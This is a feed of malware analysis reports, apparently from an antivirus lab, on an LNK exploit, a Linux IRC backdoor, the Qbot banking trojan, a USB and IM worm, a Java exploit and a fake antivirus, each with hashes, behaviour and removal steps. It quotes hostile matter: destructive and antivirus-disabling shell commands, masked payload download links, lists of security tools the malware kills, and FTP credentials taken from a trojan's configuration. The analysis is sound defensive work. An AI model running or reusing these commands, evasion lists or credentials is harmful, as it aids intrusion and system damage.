Playrhyba — Sat, 30 Apr 2011 23:21:22 +0300

The description for NewsChannel was created during beta-test of «Malware description on demand» service. Learn more about at: www.dnt-lab.com/en/services.

NewsChannel
Last edited:	26.5.2012

The exploit is designed to automatically launch other programs from USB-drives. It is a Windows shortcut (LNK-file). Its size is 461 bytes.

MD5: 0FCD30C5093D798917AEE203263ED2DB

SHA1: ABDAD79CA98697CFC1E2BDF8FD8C23F205080C30

Payload

Once launched, the exploit uses the vulnerability CVE-2010-2568 in "shell32.dll". This vulnerability allows local users or remote attackers to execute arbitrary code via a crafted .LNK or .PIF shortcut file, which is not properly handled during icon display in Windows Explorer.

When a user opens an infected USB-drive by using the Windows Explorer, the following command line will be launched:

C:\Windows\system32\rundll32.exe setup50045.fon,6279f92e

Thus, the function "6279f92e" will be called from DLL "setup50045.fon" using the system utility "rundll32.exe".

Removal Instructions

If your computer was not protected by an antivirus and was infected with this malware, follow these steps to remove it:

1. Delete the original malicious file (the location on the infected computer will depend on how the program originally penetrated the victim machine).

2. Perform a full system scan with an antivirus with updated databases.

Can't find a description for a specific malware?
You can order a description for any computer malware, virus, trojan or worm.

Backdoor.Linux.Tsunami.gen

Playrhyba — Sat, 23 Apr 2011 21:52:07 +0300

The description for NewsChannel was created during beta-test of «Malware description on demand» service. Learn more about at: www.dnt-lab.com/en/services.

NewsChannel
Last edited:	26.5.2012

The backdoor provides an attacker with a remote access to an infected machine. It is a Linux application (ELF-file). It is 29318 bytes in size.

MD5: 1610768b1524e24d840ae25964d02c8e

SHA1: 8766ba34a15e56850feab896b37a987077b0d2a4

Payload

The backdoor provides networking with the following hosts:

80.243.***.131

In response, the backdoor receives next commands from an attacker:

TSUNAMI
UNKNOWN
NICK
SERVER
GETSPOOFS
SPOOFS
DISABLE
ENABLE
KILL
VERSION
KILLALL
HELP
IRC
SH
PAN
MOVE
UDP
GET

Depending on command backdoor can perform the following actions:

downloads files from the Internet to save them with the specified name and run (GET);
executes shell commands (SH);
communicates via HTTP and IRC channels (SERVER, NICK, IRC, VERSION, HELP, MOVE, KILL);
organizes DDoS-attacks on the specified IP-address (TSUNAMI, GETSPOOFS, SPOOFS, DISABLE, ENABLE, PAN, UDP, KILLALL);

Thus backdoor provides an attacker a full access to an infected computer, which becomes a part of a botnet.

Removal instructions

If your computer does not have an antivirus, and is infected by this malicious program, follow the instructions below to delete it:

1. Delete the original malicious file (the location on the infected computer will depend on how the program originally penetrated the victim machine).

2. Perform a full system scan with an antivirus with updated databases.

Can't find a description for a specific malware?
You can order a description for any computer malware, virus, trojan or worm.

Trojan-PSW.Win32.Qbot.byy

Playrhyba — Sat, 16 Apr 2011 23:17:17 +0300

The description for NewsChannel was created during beta-test of «Malware description on demand» service. Learn more about at: www.dnt-lab.com/en/services.

NewsChannel
Last edited:	26.5.2012

It is a malicious program that provides an attacker with remote access to an infected machine.It is a Windows application (PE-EXE file). Its size is 249,344 bytes. It is packed by UPX. The unpacked file is about 279 KB. It is written in C++.

MD5: 78415F430F79382AC9DD377B806C52BE

SHA1: F6B1D472EAE28CE16A5C3D7DEDE92184CF8E1424

Installation

Once launched, the backdoor copies its body to the file:

%ALLUSERSPROFILE%\Application Data\Microsoft\<rnd_1>\<rnd_1>.exe

where <rnd_1> - random name (for example: "uiouy").

The backdoor appends a path to the created copy to a value of one of registry keys found in the following branch for the purpose of launching the created copy automatically each time the system starts:

[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]

For example:

[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
<Application name> = ""% ALLUSERSPROFILE%\Application Data\Microsoft\<rnd_1>\<rnd_1>.exe "/c <old value>

It also creates a registry key:

[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
"<rnd_2>" = "%ALLUSERSPROFILE%\Application Data\Microsoft\<rnd_1>\<rnd_1>.exe"

where <rnd_2> - random name (for example: "jladjtrq").

If the backdoor can't create keys in the aforementioned branch, these actions will be executed in the branches:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Runonce]

Payload

Once launched, the backdoor performs the following actions:

It creates a unique identifier with the following name to control uniqueness of its process:

<the name of backdoor's executable>a<username>

It collects the following information about the system:

- User name;

- Computer name;

- The serial number of the system drive;

- The registry key value:

[HKLM\Software\Microsoft\Windows NT\CurrentVersion]
"ProductId"

- A list of software installed on the infected computer. For this purpose, the backdoor reads values of "ProductName" keys in the registry branch:

[HKCR\Installer\Products]

The collected information is sent to attacker's server.

It terminates processes and stops system services that contain the following substrings in the names:

webroot.
agnitum
ahnlab
arcabit
avast
avg
avira
avp
bitdefender
bit9
castlecops
centralcommand
clamav
comodo
computerassociates
cpsecure
defender
drweb
emsisoft
esafe
. Eset
etrust
ewido
fortinet
f-prot
f-secure
gdata
grisoft
hacksoft
hauri
ikarus
jotti
k7computing
kaspersky
malware
mcafee
networkassociates
nod32
norman
norton
panda
pctools
prevx
quickheal
rising
rootkit
securecomputing
sophos
spamhaus
spyware
sunbelt
symantec
threatexpert
trendmicro
virus
wilderssecurity
windowsupdate

It terminates the following processes:

msdev.exe
dbgview.exe
mirc.exe
ollydbg.exe
ctfmon.exe

It extracts the files from its body, which are stored in the system under the following names:

%ALLUSERSPROFILE%\Application Data\Microsoft\<rnd_1>\<rnd_1>.dll (135,216 bytes; it is detected by Kaspersky Antivirus as "Trojan-PSW.Win32.Qbot.byx")
 
%ALLUSERSPROFILE%\Application Data\Microsoft\<rnd_1>\<rnd_3>.dll

where <rnd_3> - <rnd_1> name's first 4 characters.

The file "<rnd_ 3>.dll" contains the encrypted information to configure the further malware's work. For instance this file can contain the following strings:

# Line begining with '#' is a comment
# '#' - Not in the begining - is not a comment!!!
# Irc_servers = master.madway.net
 
irc_ssl_server_port = 16668
irc_pass = Zrmausakl1829997
p2p_node_lst = http://bc***1.in/cgi-bin/ls1.pl
ftphost_1 = 77.221.***.75: agamain: qu5end8k: /. cpanel
ftphost_2 = ftp.acme****rmation.com: logs@acmeinformation.com: zubri51241:
ftphost_3 = ftp.hun***central.com: testuser@hunterscentral.com: kolbasa25:
ftphost_4 = s046.pane****manager.com: equipem1: 4Y2V64b0dy67: /. last
update_conf_ver = 861

Once launched, the backdoor writes generated data, as well as some collected information to the configuration file. For example:

alias__qbot.cb = uiou.dll
alias__qbotinj.exe = uiouy.exe
alias__qbot.dll = uiouy.dll
alias_seclog.txt = uio.dll
alias_si.txt = larvsox
alias_ps_dump = oejtuy12n
alias_qa.bin == wcod
home_dir=c:\\documents and settings\\all users\\application data\\microsoft\\uiouy
irc_my_nick = vwnfjq298080
install_time = 20.46.28-9/04/2011

This file is encrypted and sent to attacker's server.

It calls the function "kIlsasgcbag0a" from extracted DLL "<rnd_1>.dll". This function installs the hook procedure for monitoring messages in the system queue. It allows the malware to hide its working directory and track the user activity on the infected system (keystrokes, file access, network traffic, etc.). The obtained information is stored in the file:

% ALLUSERSPROFILE%\Application Data\Microsoft\<rnd_1>\<rnd_4>.dll

where <rnd_4> - <rnd_1> name's first 3 characters.

Below is an example of the log created by the malware during user authentication on the site "vk.com".

t=kb time=[23:49:55-9/4/2011] p=[Explorer.EXE] b=[iexplore]
t=kb time=[23:50:7-9/4/2011] p=[iexplore.exe] b=[vk]
t=kb time=[23:50:16-9/4/2011] p=[iexplore.exe] b=[http://vk.com]
t=kb time=[23:50:34-9/4/2011] p=[iexplore.exe] b=[IvanIvanov@mail.ru]
t=kb time=[23:50:41-9/4/2011] p=[iexplore.exe] b=[MyPassword]
t=u1 time=[23:50:42-9/4/2011] ua=[Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)]
t=h1 time=[23:50:42-9/4/2011] url=[http://login.vk.com/?act=login] data=[act=login&q=1&al_frame=1&expire=&captcha_sid=&captcha_key=&from_host=vk.com&email=IvanIvanov@mail.ru&pass=MyPassword] referer=[http://vk.com] cookie=[remixlang=0; remixchk=5]

The generated log can be sent to the attacker's server.

Using the extracted DLL the backdoor can steal confidential user's information in case of authentication on the following resources that provide online banking services:

cashproonline.bankofamerica.com
singlepoint.usbank.com
netconnect.bokf.com
business-eb.ibanking-services.com
cashproonline.bankofamerica.com
ebanking-services.com
web-cashplu's. com
treas-mgt.frostbank.com
business-eb.ibanking-services.com
treasury.pncbank.com
access.jpmorgan.com
ktt.key.com
premierview.membersunited.org
directline4biz.com
onb.webcashmgmt.com
tmconnectweb
moneymanagergps.com
ibc.klikbca.com
directpay.wellsfargo.com
express.53.com
itreasury.regions.com
itreasurypr.regions.com
cpw-achweb.bankofamerica.com
businessaccess.citibank.citigroup.com
businessonline.huntington.com

Also the considered DLL exports the function "zupidshc21mnu", designed to remove the installed hook procedure.

It connects to the following servers:

n**0.in
d**1.in
ad***v.co.in
u**03.com.ua
red****er.com.ua

Following an attacker's command, the backdoor can perform the following actions:

- Gathering information;

- Send collected information to the specified server;

- Downloading files.

- Update its executable;

- Run and terminate processes;

- Start and stop services;

- Self-destruction.

The described functionality can be injected into the address space of the following processes:

explorer.exe
iexplore.exe
outlook.exe
firefox.exe
opera.exe
skype.exe
msnmsgr.exe
yahoomessenger.exe
chrome.exe

The malicious program can be run with the following parameters:

/t - it sends the WM_QUIT message to the window "<rnd_1> <username>" and end its work.

/s - the malware is started as a Windows service.

/i - it extracts the files:

%ALLUSERSPROFILE%\Application Data\Microsoft\<rnd_1>\<rnd_1>.dll
%ALLUSERSPROFILE%\Application Data\Microsoft\<rnd_1>\<rnd_3>.dll

and, after this, it terminates.

Removal Instructions

If your computer was not protected by an antivirus and was infected with this malware, follow these steps to remove it:

1. Restart the computer in "Safe Mode" (at the beginning of loading press and hold «F8», then select «Safe Mode» at the Windows boot menu).

2. Delete the following files:

%ALLUSERSPROFILE%\Application Data\Microsoft\<rnd_1>\<rnd_1>.exe
%ALLUSERSPROFILE%\Application Data\Microsoft\<rnd_1>\<rnd_1>.dll 
%ALLUSERSPROFILE%\Application Data\Microsoft\<rnd_1>\<rnd_3>.dll
%ALLUSERSPROFILE%\Application Data\Microsoft\<rnd_1>\<rnd_4>.dll

3. Delete keys created by the malware and restore the original keys value in the branches of the system registry:

[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Runonce]

4. Delete the original trojan file (its location on the infected computer will depend on how the program originally penetrated the victim machine).

5. Clear the Temporary Internet Files directory, which may contain infected files.

6. Perform a full system scan with an antivirus with updated databases.

Can't find a description for a specific malware?
You can order a description for any computer malware, virus, trojan or worm.

Net-Worm.Win32.Kolab.wwh

Playrhyba — Sat, 09 Apr 2011 23:27:20 +0300

The description for NewsChannel was created during beta-test of «Malware description on demand» service. Learn more about at: www.dnt-lab.com/en/services.

NewsChannel
Last edited:	26.5.2012

The worm provides an attacker with a remote access to an infected machine. It is a Windows application (PE-EXE file). It is 219,648 bytes in size. It is packed by UPX. The unpacked file is about 415 KB in size. It is written in C++.

MD5: A5186E9AA2F8C37E80852DD52E31284B

SHA1: D91712CB8289A5D11E2DC1D586AA31F9FA98C9C2

1 Anti-debugging
2 Installation
3 Payload
4 Propagation
5 Removal instructions

Anti-debugging

The worm implements anti-debugging algorithms that prevent it from running in virtual environments. The worm terminates and deletes its executable file in one of the following conditions:

the system registry key value:

[HKLM\System\ControlSet001\Services\Disk\Enum]
"0"

contains the strings:

VMware
VBox
Virtual
QEMU

The full path to the worm's executable file contains the substrings:

sample
virus
sand-box
sandbox
malware
test

The names of a computer and a user contain a substring:

VMG-CLIENT
MORTE
Malekal
HOME-OFF-D5F0AC
DELL-D3E62F7E26
KAKAPROU-6405DA

The system is running processes whose names contain substrings:

port
vbox
vmsrvc
vmware
tcpview
wireshark.exe
regshot.exe
procmon.exe
filemon.exe
regmon.exe
procdump.exe
cports.exe
procexp.exe
squid.exe
dumpcap.exe

The windows have been found with the following parameters:

The files have been found in the system:

C:\Program Files\WinPcap\rpcapd.exe
C:\Program Files\WireShark\rawshark.exe
C:\Program Files\Ethereal\ethereal.html
C:\Program Files\Microsoft Network Monitor 3\netmon.exe

Installation

Once launched, the worm copies its body to the file:

%System%\igfxtm32.exe

The file attributes set to “hidden”,“system”.

The following registry key is created to start the created copy automatically each time the system starts:

[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
"Intel Task Management" = %System%\igfxtm32.exe

Next, the created copy is executed with a parameter that contains the full path to the original worm’s file.

Payload

Once launched, the worm performs the following actions:

Deletes the file specified in the parameter.
Adds itself to the list of allowed network applications in Windows firewall by creating registry keys:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"%System%\igfxtm32.exe" = "%System%\igfxtm32.exe:*:Enabled:wLAN"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List]
"%System%\igfxtm32.exe" = "%System%\igfxtm32.exe:*:Enabled:wLAN"

Prohibits the displaying of hidden files by changing the system registry key values:

[HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden]
"CheckedValue" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Hidden" = "2"

Allows its application to run with administrator privileges every time, by adding a reference to its executable file in the list of exceptions DEP (Data Execution Prevention), by modifying the registry key:

[HKLM\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers]
"%System%\igfxtm32.exe" = "DisableNXShowUI"

Disables system restore, changing the key values:

[HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore]
"DisableSR" = "1"

[HKLM\Software\Policies\Microsoft\Windows NT\SystemRestore]
"DisableConfig" = "1"

Changes the settings of Windows Security Center, disabling its notifications and components. To do this, the key values are changed:

 
[HKLM\Software\Microsoft\Security Center]
"AntiVirusOverride" = "1"
"AntiVirusDisableNotify" = "1"
"FirewallOverride" = "1"

Blocks booting the infected computer in "safe mode" by removing all the keys in the branches of the registry:

[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network]

Prohibits sending information to Microsoft about found threats on a computer, by creating the following registry key:

 
[HKLM\Software\Policies\Microsoft\MRT]
"DontReportInfectionInformation" = "1"

Disables the automatic startup of service called "wscsvc" ("Windows Security Center"), changing the key value:

[HKLM\System\CurrentControlSet\Services\wscsvc]
"Start" = "4"

Sets the attributes "hidden", "system" for "%System%" directory.
Terminates the following processes:

MBAMGUI.EXE
COMBOFIX.EXE
CATCHME.EXE
TEATIMER.EXE
MRT.EXE
MRTSTUB.EXE
TCPVIEW.EXE
HIJACKTHIS.EXE
MSMPENG.EXE
MSASCUI.EXE
MPCMDRUN.EXE
USBGUARD.EXE
BILLY.EXE

Terminates the processes that contain the following substrings in the names:

recycler
temp
tmp
msvmiode.exe
drive32.exe
wudfhost.exe
svchos.exe
servicers.exe
uninstall_.exe
undmgr.exe
chgservice.exe
usbmngr.exe
serivces.exe
cmmon32.exe
rvhost.exe

After that, it deletes the corresponding executable files of these processes.

Finds processes of system services, which names contain the substring:

prevx
k7rtscan
ashserv
avguard
vsserv
avg
nod32krn
ekrn
mcshield
mbamservice
savservice
smc
rtvscan
dwengine
drwebcom
spidernt
spysweeper
outpost
tmpfw
uiWatchDog.exe
kpf4
cmdagent
vsmon
sbpflnch
acs

The found services will be stopped and removed by running the following command sequence in "CMD":

CMD /C net stop <service name>
CMD /C sc stop < service name >
CMD /C sc config < service name > start= disabled
CMD /C sc delete < service name >

If the worm finds the windows with the parameters during its work:

then the following sequence of commands will be executed:

CMD /C attrib -s -h "C:\ntldr"
CMD /C move "C:\ntldr" "C:\dump"
CMD /C del /F /S /Q "%WINDIR%\system32\hal.dll"

Thus, the system file called "C:\ntldr" will be moved to "C:\dump", after that the following file will be deleted:

%System%\hal.dll

Then the process called "csrss.exe" will be terminated and the command will be executed:

CMD /C "shutdown –s

This will reboot the system.

If the worm finds the windows with the parameters during its work:

then the process called "csrss.exe" will be terminated and the command will be executed:

CMD /C "shutdown –s

This will reboot the system.

If the worm finds the running process with the name containing the string ".cfxxe", then the command will be executed:

CMD /C del /F /S /Q \"C:\\ComboFix.txt\"

This will delete the file "C:\ComboFix.txt".

Overwrites the files:

C:\cwsandbox\cwsandbox.exe
C:\Program Files\Wireshark\wireshark.exe

with a copy of:

%WinDir%\notepad.exe

Injects into the process called "EXPLORER.EXE" executable code that downloads from the Internet file by the link:

http://vm.u****exy.su/net/p1.exe

Once the file is successfully downloaded it will be executed. At the time of writing, by the above link the downloaded file is 250,960 bytes in size; it is detected by Kaspersky Antivirus as "Net-Worm.Win32.Kolab.xoq". When you run malware second time the most of its functionality is injected into the process called "EXPLORER.EXE".

To carry out its main malicious functionality the worm turns to one of the command centers, which are located by the following links:

s24.don****wanta.su
s19.don****wanta.su

When the worm connects to the IRC-server, it sends the following data:

PASS 3v1l$
NICK N|<system_localization>| Z-363|1|<OS_version>|<service_information>
USER XP-SPX N|<system_localization >| Z-363|1|< OS_version>|<service_information> N|< system_localization >| Z-363|1|< OS_version>|<service_information> :<computer_name>

Next, it connects to the channel:

JOIN ##t8nted!

At the time of writing the above IRC-servers were not working.

Also following the received commands from the server, the worm may perform the following actions:

- upload files by the received links and run them;

- self-destruction;

- connect to another IRC-channel;

- spread using instant messaging programs;

- send arbitrary files by using instant messaging programs.

Propagation

via removable drives and network drives where the following file is placed:

<name of infected drive>:\~TrashBin\t<rnd>.exe

<rnd> – random seven-digit decimal number.

This file is downloaded by the link:

http://vm.ub****xy.su/net/p1.exe

The following file will be places at the same folder with the original file:

<name of infected drive>:\autorun.inf

This file is obfuscated.,In addition to junk, it contains the strings:

[Autorun]
open=~TrashBin\t<rnd>.exe
icon=%windir%\system32\SHELL32.dll,4
action=Open drive to view files with Explorer
shell\open=Open
shell\open\command=~TrashBin\t<rnd>.exe
shell\open\default=1
shell\explore=Explore
shell\explore\command=~TrashBin\t<rnd>.exe
shell\search=Search...
shell\search\command=~TrashBin\t<rnd>.exe
useautoplay=1

This allows the worm to run automatically every time the user opens the infected disk using Windows Explorer. The file attributes are set up to "hidden" and "system".

Using Instant Messaging:

Skype
AIM
ICQ
Yahoom Instant Messenger
Google Talk
MSN Messenger
Paltalk
Xfire

Through local resources, using MS10-061 vulnerability.

Removal instructions

If your computer does not have an antivirus, and is infected by this malicious program, follow the instructions below to delete it:

1. Use Kaspersky Rescue Disk (download Kaspersky Rescue Disk).

2. Delete the original malicious file (the location on the infected computer will depend on how the program originally penetrated the victim machine).

3. Delete the files:

%System%\igfxtm32.exe
<name of infected drive>:\~TrashBin\t<rnd>.exe
<name of infected drive>:\autorun.inf

4. Delete the registry keys:

 
[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
"Intel Task Management" = %System%\igfxtm32.exe

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"%System%\igfxtm32.exe" = "%System%\igfxtm32.exe:*:Enabled:wLAN"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List]
"%System%\igfxtm32.exe" = "%System%\igfxtm32.exe:*:Enabled:wLAN"

[HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden]
"CheckedValue" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Hidden" = "2"

[HKLM\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers]
"%System%\igfxtm32.exe"="DisableNXShowUI"

[HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore]
"DisableSR" = "1"

[HKLM\Software\Policies\Microsoft\Windows NT\SystemRestore]
"DisableConfig" = "1"

[HKLM\Software\Microsoft\Security Center]
"AntiVirusOverride" = "1"
"AntiVirusDisableNotify" = "1"
"FirewallOverride" = "1"

[HKLM\Software\Policies\Microsoft\MRT]
"DontReportInfectionInformation" = "1"

5. Restore the values of registry key:

[HKLM\System\CurrentControlSet\Services\wscsvc]
"Start"

6. In case the system files have been deleted, restore the system from a backup.

7. Perform a full system scan with an antivirus with updated databases.

Can't find a description for a specific malware?
You can order a description for any computer malware, virus, trojan or worm.

Exploit.Java.Agent.ca

Playrhyba — Sat, 02 Apr 2011 23:26:43 +0300

The description for NewsChannel was created during beta-test of «Malware description on demand» service. Learn more about at: www.dnt-lab.com/en/services.

NewsChannel
Last edited:	26.5.2012

The malicious program is an exploit, which uses vulnerability in Sun Java JRE and JDK to download files from the Internet and to execute them on the infected machine. It consists of three Java-classes (class-files).These files sizes are 12,447; 3,047 and 3,158 bytes.

MD5: B27FAF4A90CAEF7441BD0B912BB08A0A

SHA1: B2F11840E1C315D1D7BA82CA1F4FAF39B0C0098D

MD5: 8D36BDBFB548E1196E7CEA669428B2DD

SHA1: 9D49C8347E4FCE75FF34F2BB452A9A07C3439848

MD5: 63D23DA6EA900A12A0139BC5B1B56F8F

SHA1: 195F0303A1B9E22D82919BA7DFE83AD90B4565A5

Payload

The malware is implemented by three classes with the following names:

Changes
MyBuilds
MyFiles

Once launched, the trojan exploits the vulnerability CVE-2008-5353. JDK and JRE 6.0 Update 10 and earlier are affected by this vulnerability. The vulnerability occurs during deserialization of "Calendar" objects in Sun Java VM and allows remote attackers to run untrusted applets and applications in a privileged context. Then the exploit downloads a file from passed URL. This file is launched after the successful download. The downloaded file is stored under random name in the temporary folder of the current user "%Temp%":

%Temp%\<rnd>.exe

where <rnd> - random fractional decimal number from 0 to 1. The file will not be downloaded if the operating system installed on victim's computer is not Windows.

The malware is a Java-applet. It is launched from an infected HTML-page by using the "<APPLET>" tag. URL is passed to malicious applet as the tag parameters "data" and "cc". The parameter "cc" specifies the number of iterations of downloading cycle. The URL to download each file is composed as follows:

URL = data + i,

where URL - link to download the next file;

data - the value of tag parameter "data";

i - integer decimal number, 0 <= i < cc;

cc - the value of tag parameter "cc".

Removal Instructions

If your computer was not protected by an antivirus and was infected with this malware, follow these steps to remove it:

1. Update Sun Java JRE and JDK to the latest versions.

2. Delete the following files:

%Temp%\<rnd>.exe

3. Clear the Temporary Internet Files directory, which may contain infected files.

4. Perform a full system scan with an antivirus with updated databases.

Can't find a description for a specific malware?
You can order a description for any computer malware, virus, trojan or worm.

Trojan.Win32.FakeAV.doq

Playrhyba — Sun, 27 Mar 2011 22:50:10 +0300

The description for NewsChannel was created during beta-test of «Malware description on demand» service. Learn more about at: www.dnt-lab.com/en/services.

NewsChannel
Last edited:	26.5.2012

It is a trojan that imitates the work of anti-virus program for the purpose of obtaining the user fee for the detection and removal of non-existent threats. It is a Windows application (PE-EXE file). Its size is 1,039,872 bytes. It is written in C++.

MD5: D7F29FBD718066B0112AF79FDC656D67

SHA1: BD796ED40EC3AAB01A36E97D46F47377A0028917

Installation

Once launched, the trojan moves its original file and saves it as

%USERPROFILE%\Local Settings\Application Data\<rnd>.exe

here <rnd> - a random decimal number.

After every launch the trojan creates the following registry key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"<the original trojan file's name>" = "%USERPROFILE%\Local Settings\Application Data\<rnd>.exe"

It allows the trojan to automatically start its executable every time you start the system.

In addition, the trojan creates the shortcut:

%USERPROFILE%\Start Menu\Programs\Security Tool.lnk

It refers to the item:

%USERPROFILE%\Local Settings\Application Data\<rnd>.exe

Payload

Once launched, the trojan simulates the process of scanning victim's computer file system, thus displaying the information about the presence of non-existent threats:

When you try to remove the displayed threats, the trojan will offer you to pass the activation:

Then the sites containing webforms for entering user's credit card data will be displayed:

defen*****ymentgate.com
secu*****soft.com

The trojan blocks the launch of new processes in system. When the new process is found, it will be terminated, and the following window will be displayed:

For example:

The trojan displays the following messages in the taskbar notification area:

The trojan also may display the message about the availability of database updates:

In addition, the trojan connects to the following address:

212.150.***.202

Removal Instructions

If your computer was not protected by an antivirus and was infected with this malware, follow these steps to remove it:

1. Restart the computer in "Safe Mode" (at the beginning of loading press and hold «F8», then select «Safe Mode» at the Windows boot menu).

2. Delete the following files:

%USERPROFILE%\Local Settings\Application Data\<rnd>.exe
%USERPROFILE%\Start Menu\Programs\Security Tool.lnk

3. Delete the system registry key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"<the original trojan file's name>" = "%USERPROFILE%\Local Settings\Application Data\<rnd>.exe"

4. Perform a full system scan with an antivirus with updated databases.

Can't find a description for a specific malware?
You can order a description for any computer malware, virus, trojan or worm.

Total Malware Info Feed

Backdoor.Win32.Buterat.cek

Installation

Payload

Removal Instructions

Exploit.Java.CVE-2010-4452.a

Payload

Removal Instructions

Trojan.Win32.Yakes.buh

Installation

Payload

Removal Instructions

Trojan.Win32.KillAV.gdb

Payload

Removal Instructions

Trojan.Win32.Qhost.mme

Contents

Installation

Payload

Spread Through Removable Devices and Network Resources

Removal Instructions

Trojan-Downloader.Java.OpenConnection.er

Payload

Removal Instructions

Worm.Win32.Autorun.hfp

Contents

Installation

Spread Through Removable Devices

Payload

Removal Instructions

Exploit.Java.CVE-2010-0840.ay

Payload

Removal Instructions

Rootkit.Win64.Banker.a

Installation

Payload

Removal Instructions

Backdoor.Win32.Gbot.ggb

Installation

Payload

Removal instructions

Worm.Win32.AutoRun.beot

Contents

Installation

Propagation

Payload

Removal instruction

Trojan-Spy.Win32.Batton.rk

Payload

Removal instructions

P2P-Worm.Win32.Palevo.cvbu

Contents

Installation

Payload

Propagation

Removal instruction

Trojan-Ransom.Boot.Seftad.a

Payload

Removal Instructions

Trojan.Win32.Agent.nbcc

Installation

Payload

Removal instructions

Backdoor.ASP.Ace.jd

Payload

Removal instructions

Trojan-PSW.Win32.Qbot.dkg

Installation

Payload

Removal instructions

Trojan-PSW.Win32.Dybalom.ggk

Payload

Removal Instructions

Exploit.JS.Pdfka.dna

Payload

Removal Instructions

Exploit.Win32.CVE-2010-2568.z

Payload

Removal Instructions

Backdoor.Linux.Tsunami.gen